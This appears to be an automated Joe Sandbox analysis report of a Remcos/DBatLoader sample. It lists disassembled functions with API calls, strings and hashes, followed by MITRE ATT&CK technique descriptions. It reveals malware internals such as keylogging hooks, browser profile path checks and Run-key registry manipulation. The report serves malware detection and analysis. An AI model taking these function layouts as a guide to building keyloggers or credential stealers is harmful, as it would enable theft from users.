
Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067

Strings

Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: Connection KeepAlive | Enabled | Timeout:
API String ID: 481472006-507513762
Opcode ID: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
Opcode Fuzzy Hash: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F

Function 0491B68E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0491B6BC
_free.LIBCMT ref: 0491B6E2

Strings

XF, xrefs: 0491B749

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: XF
API String ID: 269201875-1082896132
Opcode ID: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
Instruction ID: 0f5486c626324d294feab44471f29b0c07679294e42c6fe1e021d2bfd6df5aa3
Opcode Fuzzy Hash: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
Instruction Fuzzy Hash: 6B11B671A103245FEB209F3ABC44B5632996790774F140636F961CB2F0F7B4F8854B46

Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
___raise_securityfailure.LIBCMT ref: 00432E76

Strings

(F, xrefs: 00432E71

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (F
API String ID: 3761405300-3109638091
Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F

Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

%02i:%02i:%02i:%03i , xrefs: 00419509
| , xrefs: 00419527

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
Opcode Fuzzy Hash: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A

Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2

Strings

x(G, xrefs: 00418CFC
alarm.wav, xrefs: 00418CDD

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$x(G
API String ID: 1174141254-2413638199
Opcode ID: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
Opcode Fuzzy Hash: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF

Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CloseHandle.KERNEL32(?), ref: 00409FFD
UnhookWindowsHookEx.USER32 ref: 0040A010

Strings

Online Keylogger Stopped, xrefs: 00409FAA, 00409FB2, 00409FD9

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
Opcode Fuzzy Hash: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF

Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040B484
UserProfile, xrefs: 0040B46E

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 96e4f2f645069e5f5e4c934eb79c16a7dc0a9ba8d3cb9bf2acb87967b969eb58
Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
Opcode Fuzzy Hash: 96e4f2f645069e5f5e4c934eb79c16a7dc0a9ba8d3cb9bf2acb87967b969eb58
Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9

Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437

Strings

UserProfile, xrefs: 0040B40B
\AppData\Local\Google\Chrome\, xrefs: 0040B421

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 7dca85de0655cbdc8cfc9d8b603e156668a071609341b80090fddc775dea4188
Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
Opcode Fuzzy Hash: 7dca85de0655cbdc8cfc9d8b603e156668a071609341b80090fddc775dea4188
Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD

Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD

Strings

AppData, xrefs: 0040B4D1
\Opera Software\Opera Stable\, xrefs: 0040B4E7

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: ef534406961c6a7538270c165368604e181e440150294ec6f471147a3b3f123b
Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
Opcode Fuzzy Hash: ef534406961c6a7538270c165368604e181e440150294ec6f471147a3b3f123b
Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD

Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040A597

Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

[AltR], xrefs: 0040A5CD
[AltL], xrefs: 0040A5D9

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
Opcode Fuzzy Hash: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF

Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040A5F1

Strings

[CtrlR], xrefs: 0040A60E
[CtrlL], xrefs: 0040A61F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
Opcode Fuzzy Hash: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF

Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,004721E8,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,004721E8), ref: 00412422
RegDeleteValueW.ADVAPI32(004721E8,?,?,00472200,pth_unenc,004721E8), ref: 00412436

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664

Function 00433058 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064

Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA

__CxxThrowException@8.LIBVCRUNTIME ref: 00433072

Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25

Strings

P@, xrefs: 00433058

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: P@
API String ID: 1586462112-676759640
Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5

Function 00433038 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044

Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83

__CxxThrowException@8.LIBVCRUNTIME ref: 00433052

Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25

Strings

P@, xrefs: 00433038

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: P@
API String ID: 1586462112-676759640
Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5

Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
GetLastError.KERNEL32 ref: 0043B4E9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799

Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1m181Ru74o.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

